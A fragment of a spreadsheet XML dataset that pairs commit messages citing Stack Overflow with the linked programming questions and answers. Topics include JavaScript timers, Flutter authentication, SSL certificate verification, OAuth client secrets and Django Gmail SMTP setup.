&lt;p&gt;I'd like, on mouse up, it'll be a single shape (or at least shapes in the same layer) that convert the width of the stroke into custom shape, like both the 'x' and the 'i'. Is it possible? Because, my goal is:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;to create shape that can be subtracted/cut by another shape to erase.&lt;/li&gt;
&lt;li&gt;to make opacity even across the shapes in single layer, so, it'll not become overlapping.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If it's in adobe illustrator the behavior is similar to &lt;em&gt;expand to shape&lt;/em&gt;. So, It'll take the line, convert it to a shape alongside its stroke width and it will no longer be editable as a line.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C6</t>
  </si>
  <si>
    <t>Major refactoring: Use more accurate timer
See also https://stackoverflow.com/questions/29971898/how-to-create-an-accurate-timer-in-javascript.</t>
  </si>
  <si>
    <t>Why is it not accurate? Because you are using setTimeout() or setInterval().
They cannot be trusted, there are no accuracy guarantees for them.
They are allowed to lag
arbitrarily, and they do not keep a constant pace but
tend to drift
(as you have observed).
How can I create an accurate timer?
Use the
Date
object instead to get the (millisecond-)accurate, current time. Then base your logic on the current time value, instead of counting how often your callback has been executed.
For a simple timer or clock, keep track of the time
difference
explicitly:
var start = Date.now();
setInterval(function() {
    var delta = Date.now() - start; // milliseconds elapsed since start
    output(Math.floor(delta / 1000)); // in seconds
    // alternatively just show wall clock time:
    output(new Date().toUTCString());
}, 1000); // update about every second
Now, that has the problem of possibly jumping values. When the interval lags a bit and executes your callback after
990
,
1993
,
2996
,
3999
,
5002
milliseconds, you will see the second count
0
,
1
,
2
,
3
,
5
(!). So it would be advisable to update more often, like about every 100ms, to avoid such jumps.
However, sometimes you really need a steady interval executing your callbacks without drifting. This requires a bit more advanced strategy (and code), though it pays out well (and registers less timeouts). Those are known as
self-adjusting
timers. Here the exact delay for each of the repeated timeouts is adapted to the actually elapsed time, compared to the expected intervals:
var interval = 1000; // ms
var expected = Date.now() + interval;
setTimeout(step, interval);
function step() {
    var dt = Date.now() - expected; // the drift (positive for overshooting)
    if (dt &gt; interval) {
        // something really bad happened. Maybe the browser (tab) was inactive?
        // possibly special handling to avoid futile "catch up" run
    }
     // do what is to be done
    expected += interval;
    setTimeout(step, Math.max(0, interval - dt)); // take into account drift
}</t>
  </si>
  <si>
    <t xml:space="preserve">I am in the middle of a "discussion" with a colleague about the best way to implement the data layer in a new application.
One viewpoint is that the data layer should be aware of business objects (our own classes that represent an entity), and be able to work with that object natively.  
The opposing viewpoint is that the data layer should be object-agnostic, and purely handle simple data types (strings, bools, dates, etc.)
I can see that both approaches may be valid, but my own viewpoint is that I prefer the former.  That way, if the data storage medium changes, the business layer doesn't (necessarily) have to change to accommodate the new data layer.  It would therefore be a trivial thing to change from a SQL data store to a serialized xml filesystem store.
My colleague's point of view is that the data layer shouldn't have to know about object definitions, and that as long as the data is passed about appropriately, that is enough.  
Now, I know that this is one of those questions that has the potential to start a religious war, but I'd appreciate any feedback from the community on how you approach such things.  
TIA
</t>
  </si>
  <si>
    <t>C60</t>
  </si>
  <si>
    <t>Added graphs for each province, auto-login if already logged in, referenced:  https://stackoverflow.com/questions/54469191/persist-user-auth-flutter-firebase</t>
  </si>
  <si>
    <t>I believe your problem is routing. In my apps I use FirebaseAuth and it works just as you say you wanted to, and I don't persist any login token. However, I don't know why your approach of using a getUser is not working.
Try to adjust your code to use onAuthStateChanged. EDIT: As of 2022, with Flutter 3, I noticed it worked better with userChanges  instead.
Basically, on your MaterialApp, create a StreamBuilder listening to _auth.userChanges() and choose your page depending on the Auth status.
I'll copy and paste parts of my app so you can have an idea (see below).
[...]
final FirebaseAuth _auth = FirebaseAuth.instance;
Future&lt;void&gt; main() async {
  FirebaseApp.configure(
    name: '...',
    options:
      Platform.isIOS
        ? const FirebaseOptions(...)
        : const FirebaseOptions(...),
    );
  [...]  
  runApp(new MaterialApp(
    title: '...',
    home: await getLandingPage(),
    theme: ThemeData(...),
  ));
}
Future&lt;Widget&gt; getLandingPage() async {
  return StreamBuilder&lt;FirebaseUser&gt;(
    stream: _auth.userChanges(),
    builder: (BuildContext context, snapshot) {
      if (snapshot.hasData &amp;&amp; (!snapshot.data!.isAnonymous)) {
        return HomePage();
      }
      return AccountLoginPage();
    },
  );
}
UPDATE: As of 2024, I believe the recommended approach would be using go_router. In that sense, that code would change to something like:
[...]
  final GoRouter _router = GoRouter(
    refreshListenable: GoRouterRefreshStream(FirebaseAuth.instance.userChanges()),
  runApp(MaterialApp.router(
    [...]
    routeInformationProvider: _router.routeInformationProvider,
    routeInformationParser: _router.routeInformationParser,
    routerDelegate: _router.routerDelegate,
  ));
[...]
However (sorry!), it seems GoRouterRefreshStream was removed from go_router, and then I don't know YET what's the new way of doing it.</t>
  </si>
  <si>
    <t xml:space="preserve">Recently thanks to rails' popularity, many people start using activerecord as model. however, before I heard of rails (my peer group was not a fan of open source stuff, we were taught in a .NET school...) and while I was doing my final year project, i found this definition for a model
  The model represents enterprise data and the business rules that govern access to and updates of this data. Often the model serves as a software approximation to a real-world process, so simple real-world modeling techniques apply when defining the model.
it doesn't say the model should represent one table as what activerecord does. And normally within a transaction, one may have to query a few unrelated tables and then manipulate data from different tables... so if activerecord is used as model, then either one would have to cram all the logic code into the controller (which is kinda popular in some php frameworks) that makes it difficult to test or hack the activerecord model so that it performs database operation on not only the table it maps to, but also other related tables as well...
so, what is so great about abusing (IMHO) activerecord as the model in a MVC architectural pattern?
</t>
  </si>
  <si>
    <t>C600</t>
  </si>
  <si>
    <t>Use the system root certificates in Neon's ne_ssl_trust_default_ca() 
on Win32
Fixes a problem that was noticed when working on bnc#805901, which is about
documents opened from WebDAV (using https) not being locked (in the WebDAV
sense).
For some reason, at least in the 3.6 branch, I noticed that LibreOffice did
not manage to open any connection to the WebDAV server. The error message
"Server error message: Server certificate verification failed: issuer is not
trusted" was displayed.
Turning on Neon logging I saw the OpenSSL error code 19
(X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN) passing by.
Some googling turned up
http://stackoverflow.com/questions/4103472/ssl-handshake-fails-with-a-verisign-chain-certificate-that-contains-two-ca-s
. If I understand correctly, root certificates (which are the final ones in a
certificate chain) are by definition self-signed.</t>
  </si>
  <si>
    <t>Root certificates issued by CAs are just self-signed certificates (which may in turn be used to issue intermediate CA certificates). They have not much special about them, except that they've managed to be imported by default in many browsers or OS trust anchors.
While browsers and some tools are configured to look for the trusted CA certificates (some of which may be self-signed) in location by default, as far as I'm aware the
openssl
command isn't.
As such, any server that presents the full chain of certificate, from its end-entity certificate (the server's certificate) to the root CA certificate (possibly with intermediate CA certificates) will have a self-signed certificate in the chain: the root CA.
openssl s_client -connect myweb.com:443 -showcerts
doesn't have any particular reason to trust Verisign's root CA certificate, and because it's self-signed you'll get "
self signed certificate in certificate chain
".
If your system has a location with a bundle of certificates trusted by default (I think
/etc/pki/tls/certs
on RedHat/Fedora and
/etc/ssl/certs
on Ubuntu/Debian), you can configure OpenSSL to use them as trust anchors, for example like this:
openssl s_client -connect myweb.com:443 -showcerts -CApath /etc/ssl/certs</t>
  </si>
  <si>
    <t xml:space="preserve">We have a large suite of apps, most are C# 1.1, but at least 10 major ones are in VB6.  We are undertaking a project to bring up the VB6 apps to .NET 3.5.  
All the c# 1.1 apps are written using a traditional n-Tier approach.  There isn't really any architecture/separation to the UI layer.  Most of the code just responds to events and goes from there.  I would say that from the point of maintainability, it's been pretty good and it's easy to follow code and come up to speed on new apps. 
As we are porting VB6 apps, the initial thinking was that we should stick to the existing pattern (e.g. n-Tier).
I am wondering, whether it's worth it breaking the pattern and doing VB6 apps using teh MVP/MVC pattern?  Are MVC/MVP winform apps really easier to maintain?  I worked on a MVC-based project and did not feel that it was easier to maintain at all, but that's just one project.  
What are some of the experiences and advice out there?
</t>
  </si>
  <si>
    <t>C601</t>
  </si>
  <si>
    <t>Added example for client-side certificates validation
I've spent some time figuring this out on my own (and have written an answer to the only other guy on SO that asked himself the same question http://stackoverflow.com/questions/41701791/aiohttp-and-client-side-ssl-certificates/43664652#43664652)</t>
  </si>
  <si>
    <t>EDIT: I've submitted a PR with an update to the aiohttp documentation regarding the subject, and it's been merged.
For anyone who might encounter this issue in the future..
TL:DR
import ssl
import aiohttp    
ssl_ctx = ssl.create_default_context(cafile='/path_to_client_root_ca')
ssl_ctx.load_cert_chain('/path_to_client_public_key.pem', '/path_to_client_private_key.pem')
conn = aiohttp.TCPConnector(ssl_context=ssl_ctx)
session = aiohttp.ClientSession(connector=conn)
# session will now send client certificates..
The long story - I've looked how it's implemented in requests (which neatly documents the API here), and apparently it's implemented inside of urllib3.
urllib3 trickles down the cert parameter all the way down to its HTTPSConnection object, where it eventually calls this function:
...
self.sock = ssl_wrap_socket(
    sock=conn,
    keyfile=self.key_file,
    certfile=self.cert_file,
    ssl_context=self.ssl_context,
)
...
which does:
...
if ca_certs or ca_cert_dir:
    try:
        context.load_verify_locations(ca_certs, ca_cert_dir)
    except IOError as e:  # Platform-specific: Python 2.6, 2.7, 3.2
        raise SSLError(e)
    # Py33 raises FileNotFoundError which subclasses OSError
    # These are not equivalent unless we check the errno attribute
    except OSError as e:  # Platform-specific: Python 3.3 and beyond
        if e.errno == errno.ENOENT:
            raise SSLError(e)
        raise
elif getattr(context, 'load_default_certs', None) is not None:
    # try to load OS default certs; works well on Windows (require Python3.4+)
    context.load_default_certs()
if certfile:
    context.load_cert_chain(certfile, keyfile)
if HAS_SNI:  # Platform-specific: OpenSSL with enabled SNI
    return context.wrap_socket(sock, server_hostname=server_hostname)
...
The interesting call here is to load_cert_chain - this means that if we just create an ssl.SSLContext (which is a standard library interface) object and call load_cert_chain with our client certificates like so, aiohttp will behave the same as requests\urllib3.
So although aiohttp's documentation is lacking in telling you that,  they do specify that you can load your own ssl.SSLContext.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have two Google Web Apps, one with a POST request and one with a GET request but the GET request seems to only receive a Google error page HTML and I'm not sure how to move forward.&lt;/p&gt;
&lt;p&gt;The end goal is for the Main Web App to send data to the Second Web App, which will then generate email drafts in the user's folder. This cannot happen from the Main Web App because (due to unrelated reasons) Main Web App must execute as the developer. I've set the CreateDrafts web app to execute as the user, so the drafts end up in their inbox, not mine.&lt;/p&gt;
&lt;p&gt;Main Web App Google Apps Script code&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function doGet(e) {
  return HtmlService.createTemplateFromFile(&amp;quot;Index&amp;quot;).evaluate()
    .setTitle(&amp;quot;Main Web App&amp;quot;);
}
function sendPostRequest() {
  const webAppUrl = &amp;quot;https://script.google.com/macros/s/(secondWebAppId)/exec&amp;quot;; 
  try {
    const data = { message: &amp;quot;Post request sent&amp;quot; };
    const options = {
      method: &amp;quot;POST&amp;quot;,
      contentType: &amp;quot;application/json&amp;quot;,
      payload: JSON.stringify(data),
      muteHttpExceptions: true
    };
    const response = UrlFetchApp.fetch(webAppUrl, options);
    const content = response.getContentText();
    return JSON.parse(content);
  } catch (error) {
    return { success: false, message: &amp;quot;Error sending POST request&amp;quot; + error.toString() };
  };
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Index.html&lt;/p&gt;
&lt;pre class="lang-html prettyprint-override"&gt;&lt;code&gt;&amp;lt;!DOCTYPE html&amp;gt;
&amp;lt;html lang=&amp;quot;en&amp;quot;&amp;gt;
&amp;lt;head&amp;gt;
  &amp;lt;meta charset=&amp;quot;UTF-8&amp;quot;&amp;gt;
  &amp;lt;meta name=&amp;quot;viewport&amp;quot; content=&amp;quot;width=device-width, initial-scale=1.0&amp;quot;&amp;gt;
  &amp;lt;title&amp;gt;Main Web App&amp;lt;/title&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
  &amp;lt;button onclick=&amp;quot;sendPostRequest()&amp;quot;&amp;gt;Send POST Request&amp;lt;/button&amp;gt;
  &amp;lt;p id=&amp;quot;status&amp;quot;&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;script&amp;gt;
  function sendPostRequest() {
    google.script.run
      .withSuccessHandler(response =&amp;gt; {
        console.log(response);
        if (response.success) {
          document.getElementById(&amp;quot;status&amp;quot;).innerText = &amp;quot;POST request successful&amp;quot; + response.message;
        } else {
          document.getElementById(&amp;quot;status&amp;quot;).innerText = &amp;quot;Error:&amp;quot; + response.message;
        }
      })
      .sendPostRequest();
  }
&amp;lt;/script&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Second Web App Code&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function doGet(e) {
  return ContentService.createTextOutput(
    JSON.stringify({ success: true, message: &amp;quot;GET request received successfully.&amp;quot; })
  ).setMimeType(ContentService.MimeType.JSON);
}
function doPost(e) {
  try {
    const rawData = e.postData ? e.postData.contents : &amp;quot;{}&amp;quot;;
    return ContentService.createTextOutput(
      JSON.stringify({ success: true, message: &amp;quot;POST received&amp;quot;, data: rawData })
    ).setMimeType(ContentService.MimeType.JSON);
  } catch (error) {
    return ContentService.createTextOutput(
      JSON.stringify({ success: false, message: &amp;quot;Error: &amp;quot; + error })
    ).setMimeType(ContentService.MimeType.JSON);
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Both apps have the same appsscript.json:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{
  &amp;quot;timeZone&amp;quot;: &amp;quot;America/Los_Angeles&amp;quot;,
  &amp;quot;dependencies&amp;quot;: {
    &amp;quot;enabledAdvancedServices&amp;quot;: [
      {
        &amp;quot;userSymbol&amp;quot;: &amp;quot;Gmail&amp;quot;,
        &amp;quot;version&amp;quot;: &amp;quot;v1&amp;quot;,
        &amp;quot;serviceId&amp;quot;: &amp;quot;gmail&amp;quot;
      }
    ],
    &amp;quot;libraries&amp;quot;: [
      {
        &amp;quot;userSymbol&amp;quot;: &amp;quot;OAuth2&amp;quot;,
        &amp;quot;version&amp;quot;: &amp;quot;43&amp;quot;,
        &amp;quot;libraryId&amp;quot;: &amp;quot;1B7FSrk5Zi6L1rSxxTDgDEUsPzlukDsi4KGuTMorsTQHhGBzBkMun4iDF&amp;quot;
      }
    ]
  },
  &amp;quot;exceptionLogging&amp;quot;: &amp;quot;STACKDRIVER&amp;quot;,
  &amp;quot;runtimeVersion&amp;quot;: &amp;quot;V8&amp;quot;,
  &amp;quot;webapp&amp;quot;: {
    &amp;quot;executeAs&amp;quot;: &amp;quot;USER_ACCESSING&amp;quot;,
    &amp;quot;access&amp;quot;: &amp;quot;DOMAIN&amp;quot;
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've tried the minimum viable code above but it seems to trigger an internal Google error and is not returning JSON. The error message I'm getting is&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&amp;quot;Error:Error sending POST requestSyntaxError: Unexpected token '&amp;lt;', &amp;quot;&amp;lt;!DOCTYPE &amp;quot;... is not valid JSON&amp;quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;(The HTML is from a Google error page)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C602</t>
  </si>
  <si>
    <t>Allow setting SSL certificate for secure curl
This took me hours to figure out why my tracking script wouldn't connect sucessfully with my Piwik installation. Both my PHP script and Piwik were on the same server, which has an SSL certificate set up. So, I was setting PiwikTracker's Piwik base URL (class static variable `$URL`) as `https://www.mysitecom/piwik`.
And the tracking script wasn't working. If I changed `$URL` to `http://www.mysitecom/piwik`, however, it WOULD work.
Troubleshooting with curl on the command line with `curl https://www.mysitecom/piwik` showed me a useful error:
`curl: (60) SSL certificate problem, verify that the CA cert is OK. Details:
error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed`
These links helped me figure out what was going on, and how to fix it:
http://stackoverflow.com/questions/6400300/https-and-ssl3-get-server-certificatecertificate-verify-failed-ca-is-ok</t>
  </si>
  <si>
    <t>curl used to include a list of accepted certificate authorities (CAs) but no longer bundles ANY CA certs since 7.18.1 and onwards. So by default it'll reject all TLS/SSL certificates as unverifiable.
You'll have to get your CA's root certificate and point curl at it. More details at curl's details on TLS/SSL certificates verification.</t>
  </si>
  <si>
    <t xml:space="preserve">I have an n tier application with presentation layer, business layer, DAL and business objects layer. Separating the objects and the operation written on the objects break the object oriented concept of encapsulation.
</t>
  </si>
  <si>
    <t>C603</t>
  </si>
  <si>
    <t>ship oauth2 client_id and client_secret
this way a user does not need to get his own API key, though it might be
safer. as far as I can see, there should be no way to access mail
without getting the access and refresh tokens with the users consent.
according to: https://developers.google.com/identity/protocols/OAuth2#installed client_id and client_secret is not so-secret in these types of applications, but who know how this works..
a malicious attacker might steal the id and secret and use it in his own
project, this might use the app quota, but should not be able to access
user account.
some more discussion:
* http://stackoverflow.com/questions/25957027/oauth-2-installed-application-client-secret-considerationsgoogle-api/43061998#43061998
* http://stackoverflow.com/questions/19615372/client-secret-in-oauth-2-0?rq=1</t>
  </si>
  <si>
    <t>I'm developing an installed application that accesses the google-api via OAuth2.
There some security problems I currently know no real solution for.
Doesn't matter how hard I obfuscate my client-secret a determined person can retrieve and use it. Two problems arise from this:
somebody uses my client secret to modify user data:
so far it seems that an installed application needs to be authorized again when no refresh token is used. However I'm not sure if this is part of the client api I use or if it is ensured on server side. If it is ensured on server side I'm happy with it :)
somebody uses my client secret to exceed my access-limit:
Ok this is google-specific. As long as I don't pay I have a free quota and it can be exhausted. So somebody can use my client secret to exhaust the quota and no other client will be able to access it's data :( I cannot think of a real solution for this besides never ever upgrading the service to paid level.
The only secure solution that comes to my mind would be to have a webserver as gateway that interacts with google and transfers the access token to the client.
Or maybe it even keeps the tokens and just transfers the requested data(after user authentification (openid...whatever))
As conclusion:
I don't have a webserver I could use as gateway. 
Therefore as long as the user data is secured (no one can access it with a stolen client-secret without the user granting access for new tokens) I can go ahead with the free quota limit and see how fast it is exceeded  and never upgrade it.
I would be glad for any comments on this topic.
Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I can't make make the code work the proper way i tried various combination you can see below:&lt;/p&gt;
&lt;p&gt;Here it is:&lt;/p&gt;
&lt;pre class="lang-py prettyprint-override"&gt;&lt;code&gt;# ================================
# 1. IMPORTS AND TPU CONFIGURATION
# ================================
import os
import torch
import torch_xla
import torch.nn as nn
import torch.optim as optim
from torchvision import datasets, transforms, models
from torch.utils.data import DataLoader, Subset, ConcatDataset
import pytorch_lightning as pl
from pytorch_lightning.callbacks import EarlyStopping, ModelCheckpoint
from pytorch_lightning.loggers import TensorBoardLogger
import torchmetrics
from torch.optim.lr_scheduler import CyclicLR
from sklearn.model_selection import StratifiedKFold, train_test_split
import optuna
import numpy as np
# TPU-specific configuration
import torch_xla.core.xla_model as xm
from pytorch_lightning.strategies.single_device_xla import SingleDeviceXLAStrategy
num_tpu_cores = xm.xrt_world_size()
if num_tpu_cores &amp;lt;= 0:
    raise RuntimeError(&amp;quot;TPU not available. This code requires a TPU.&amp;quot;)
accelerator = &amp;quot;tpu&amp;quot;
devices = num_tpu_cores
if num_tpu_cores == 1:
    strategy = SingleDeviceXLAStrategy()
else:
    strategy = &amp;quot;xla&amp;quot;
print(f&amp;quot;[INFO] TPU available: {num_tpu_cores} cores found. They will be used.&amp;quot;)
# ================================
# 2. DATA PREPARATION
# ================================
base_dir = '/kaggle/input/chest-xray-pneumonia/chest_xray/chest_xray'
train_dir = os.path.join(base_dir, 'train')
val_dir   = os.path.join(base_dir, 'val')
test_dir  = os.path.join(base_dir, 'test')
transform = transforms.Compose([
    transforms.Resize((224, 224)),
    transforms.ToTensor(),
])
train_dataset = datasets.ImageFolder(root=train_dir, transform=transform)
val_dataset = datasets.ImageFolder(root=val_dir, transform=transform)
test_dataset = datasets.ImageFolder(root=test_dir, transform=transform)
print(&amp;quot;Classes:&amp;quot;, train_dataset.classes)
num_classes = len(train_dataset.classes)
combined_dataset = ConcatDataset([train_dataset, val_dataset])
combined_targets = train_dataset.targets + val_dataset.targets
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;...&lt;/p&gt;
&lt;p&gt;i always get an error everytime a different one like use strategy is wrong try ddp etc.. What you see above is just my last try.&lt;/p&gt;
&lt;p&gt;Here instead a version that seems to work, cause it give me no errors:&lt;/p&gt;
&lt;pre class="lang-py prettyprint-override"&gt;&lt;code&gt;try:
    import torch_xla.core.xla_model as xm
    num_tpu_cores = xm.xrt_world_size()
    if num_tpu_cores &amp;gt; 0:
        accelerator = &amp;quot;tpu&amp;quot;
        devices = um_tpu_cores
        strategy = &amp;quot;auto&amp;quot;   # Specifico per TPU
        print(f&amp;quot;[INFO] TPU disponibile: {num_tpu_cores} core trovati. Verranno utilizzati.&amp;quot;)
    else:
        raise Exception(&amp;quot;Nessun core TPU rilevato.&amp;quot;)
except Exception as e:
    if torch.cuda.is_available():
        accelerator = &amp;quot;gpu&amp;quot;
        devices = 2 if torch.cuda.device_count() &amp;gt;= 2 else 1
        strategy = &amp;quot;ddp_notebook&amp;quot; if torch.cuda.device_count() &amp;gt;= 2 else &amp;quot;auto&amp;quot;
        print(f&amp;quot;[INFO] GPU disponibile: {torch.cuda.device_count()} GPU trovata(e). VerrÃ  utilizzata la modalitÃ  {accelerator}.&amp;quot;)
    else:
        accelerator = &amp;quot;cpu&amp;quot;
        devices = 1
        strategy = &amp;quot;auto&amp;quot;
        print(&amp;quot;[INFO] Utilizzo della CPU (nessuna GPU o TPU disponibile).&amp;quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but give me this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;...[INFO] Utilizzo della CPU (nessuna GPU o TPU disponibile).Classi: ['NORMAL', 'PNEUMONIA'][I 2025-02-19 11:18:50,478] A new study created in memory with name: no-name-40e96829-412b-4450-b7c7-541f52029790/usr/local/lib/python3.10/site-packages/torchvision/models/_utils.py:208:
UserWarning: The parameter 'pretrained' is deprecated since 0.13 and may be removed in the future, please use 'weights' instead.warnings.warn(/usr/local/lib/python3.10/site-packages/torchvision/models/_utils.py:223:
UserWarning: Arguments other than a weight enum or None for 'weights' are deprecated since 0.13 and may be removed in the future. The current behavior is equivalent to passing weights=ResNet18_Weights.IMAGENET1K_V1. You can also use weights=ResNet18_Weights.DEFAULT to get the most up-to-date weights.warnings.warn(msg)Downloading:&amp;quot;https://download.pytorch.org/models/resnet18-f37072fd.pth&amp;quot; to /root/.cache/torch/hub/checkpoints/resnet18-f37072fd.pth
100%|â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆ| 44.7M/44.7M [00:00&amp;lt;00:00, 184MB/s]
[INFO] Inizio training per fold 0 usando accelerator=cpu, devices=1, strategy=autoGPU available: False, used: FalseTPU available: True, using: 0 TPU coresHPU available: False, using: 0 HPUs/usr/local/lib/python3.10/site-packages/pytorch_lightning/trainer/setup.py:183: TPU available but not used. You can set it by doing Trainer(accelerator='tpu')...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;so it goes on and judging by the speed it even seems to be using some kind of acceleration but it's slower tha GPU acceleration, even if faster than CPU alone (i tried various times different ways of accelerate it) and it should be not. So hope someone can help.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C604</t>
  </si>
  <si>
    <t>Fix for Google social login SSL error
The following error is produced when using the Google social login:
  SSLError: [Errno bad handshake] [('SSL routines', 'SSL3_GET_SERVER_CERTIFICATE', 'certificate verify failed')]
... from requests.  I believe that this error is due to the servers we
(and Democracy Club) currently run having OpenSSL 1.0.1 and using a recent
version of the certifi Python package (which contains root
certificates).
A full explanation can be found here:
  certifi/python-certifi#26
(found via: http://stackoverflow.com/a/34665344/223092 )
Since upgrading OpenSSL to 1.0.2 will be a pain, pinning certifi to the
old version is the easiest way to fix this error for the moment.
Hopefully we will upgrade the distributions on our servers in the near
future to one that supplies OpenSSL 1.0.2 and then we can switch to a
more recent certificate bundle.</t>
  </si>
  <si>
    <t>I found a solution. There seems to be a major issue in the version of
certifi
that was running. I found this out from this (very long) GitHub issue:
https://github.com/certifi/python-certifi/issues/26
TL;DR
pip uninstall -y certifi &amp;&amp; pip install certifi==2015.04.28</t>
  </si>
  <si>
    <t xml:space="preserve">I've noticed that the majority of enterprise web apps I've worked on over the past few years have seemingly mis-used the powers of oo.
That is, what once would have been perhaps 1000 lines of HTML and script, has often now morphed into 10,000 lines of code, 50 classes, and 2000 method calls to do basically the same thing.  I.e. oo and layered architecture appears to be over-used and/or ill-used, often leading to longer development times, higher-cost, and often nightmarish maintenance.
How often are other people seeing this happen?  
How can oo be effectively utilized to, as the Buddha himself has said:  as much as possible try not to harm...as much as possible try to help...
</t>
  </si>
  <si>
    <t>C605</t>
  </si>
  <si>
    <t>Update gmail.phps
The internet is littered with people trying to figure out why PHPMailer doesn't work for them with GMail.  ISPs like Digital Ocean do not support SMTP traffic over IPv6, but Google is IPv6 ready so PHPMailer waits a long time trying that before it tries IPv4.  That wait is either a major bottleneck, or a failure point as execution timeouts come into play.
See https://www.digitalocean.com/community/questions/outgoing-connections-on-port-25-587-143-blocked-over-ipv6
and
https://stackoverflow.com/questions/20068484/phpmailer-using-gmail-smtp-slow-when-sending-emails for example</t>
  </si>
  <si>
    <t>The slowness (or failure due to timeouts) is because Google supports IPv6 addressing but your network does not. (e.g. Digital Ocean does not yet support IPv6 for SMTP traffic).  So, use this:
$mail-&gt;Host = gethostbyname("smtp.gmail.com");
gethostbyname()
will return the IPv4 address.
For me, my PHPMailer script went from ~2 minutes execution time to &lt;4 seconds</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm having some trouble formulating the correct recursive behaviour to get what I want in SQL.
I'm limited to the BigQuery environment and I want to avoid using any JavaScript if I can, so I wanted to try and recreate this behaviour just using CTEs if possible.
I can do exactly what I want in Python, but have been unable to do it in SQL. Yes I know SQL is not really designed for this, but I do have a reason for it so would like to try and get it to work.
I want to be able to provide any length array and return a list of permutations.
For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;INPUT [1, 1, 1] OUTPUT [0, 0, 0]
INPUT [2, 1, 1] OUTPUT [[0, 0, 0], [1, 0, 0]]
INPUT [2, 1, 2] OUTPUT [[0, 0, 0], [1, 0, 0], [0, 0, 1], [1, 0, 1]]
INPUT [1, 5] OUTPUT [[0,0], [0,1], [0,2], [0,3], [0,4]]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I don't mind how the inputs and outputs are formatted as long as I can parse them one way or another. E.g. returning rows of strings are fine, each element in a separate row is fine as I can use array_agg, etc.&lt;/p&gt;
&lt;p&gt;In Python doing this recursively or using for-loops is pretty trivial. I start with a list of zeroes and work my way along each index, incrementing the value at that index until it reaches input value-1 and store each permutation before moving on.&lt;/p&gt;
&lt;p&gt;In SQL this is what I have so far, which is only really the first step:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;WITH RECURSIVE
  OrigSeq AS (SELECT [2, 1, 2] as some_numbers), -- input sequence
  BaseSeq AS (SELECT ARRAY(SELECT 0 as a FROM UNNEST(OrigSeq.some_numbers)) AS base FROM OrigSeq), -- get array of 0s of same size as input sequence
  Sequences AS (
    (SELECT 0 AS perm_id, 0 as idx, BaseSeq.base[0] as iter, OrigSeq.some_numbers[0]-1 AS orig, BaseSeq.base as base, OrigSeq.some_numbers as num FROM OrigSeq, BaseSeq)
    UNION ALL
    -- increment index
    SELECT perm_id, idx+1 as idx, base[idx+1] as iter, num[idx+1]-1 as orig, base, num FROM Sequences WHERE idx &amp;lt; ARRAY_LENGTH(num)-1
  ),
  Seq2 AS (
    SELECT * FROM Sequences
    UNION ALL
    -- parse iters - not doing this quite right and my brain stops functioning around here
    SELECT perm_id+1, idx, base[idx]+1 as iter, orig, base, num FROM Sequences where iter &amp;lt;= orig
  ),
  Seq3 AS (
    Select * From Seq2
    UNION ALL
    SELECT perm_id, idx, iter, orig, base, num from Sequences
  )
SELECT perm_id, idx, orig, iter
FROM Seq3
ORDER BY perm_id, idx
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any guidance appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C606</t>
  </si>
  <si>
    <t>added in 7 changes mentioned on whatsapp
1. The csrf in the submission throttling is not exactly an issue. when we tried it, the url in my browser was 127.0.0.1:8000. so it gave csrf.
    If you change it to localhost:8000, it wont give csrf error. throttling works perfectly. technically we shouldve fixed the csrf by using some token. but it's okay leave.
2. Ive added a thankyou page at the end that displays final details. have a look at it. add any details that youd like.
3. Room-type is not being sent forward to thankyou page. it's being selected in selection page. try fixing it.
The thankyoupage view, is where im sending across details to thankyou.html.
4. i added in models.py,
max_rooms_available attribute for each hotel. and in thankyoupage view, im subtracting that particular hotel's value by 1. and i did hotel.save(), or else it wont save.
you can have separate room attr for suite and deluxe if you want.
5. i tried adding in onmouseover=change bg color for the index page submission throttling.  (check index.html line-48). it didnt work. try fixing.
6. i thought it might be cool to add an email feature, where the app sends you can email about your booking details.
links:
https://www.youtube.com/watch?v=X7DWErkNVJs
https://stackoverflow.com/questions/31324005/django-1-8-sending-mail-using-gmail-smtp</t>
  </si>
  <si>
    <t>for me in settings.py:
EMAIL_USE_TLS = True
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_HOST_USER = 'test@gmail.com'
EMAIL_HOST_PASSWORD = 'test'
EMAIL_PORT = 587
and views.py:
from django.core.mail import EmailMessage
email = EmailMessage('title', 'body', to=[email])
email.send()
and: https://accounts.google.com/DisplayUnlockCaptcha
and also make sure you turn on permission for less secure apps.</t>
  </si>
  <si>
    <t xml:space="preserve">Having read all the StackOverflow entries regarding Model-View-ViewModel architecture along with most of the readily available resources on the net I have come to the conclusion that it is the de-facto standard for building SOLID Silverlight apps.
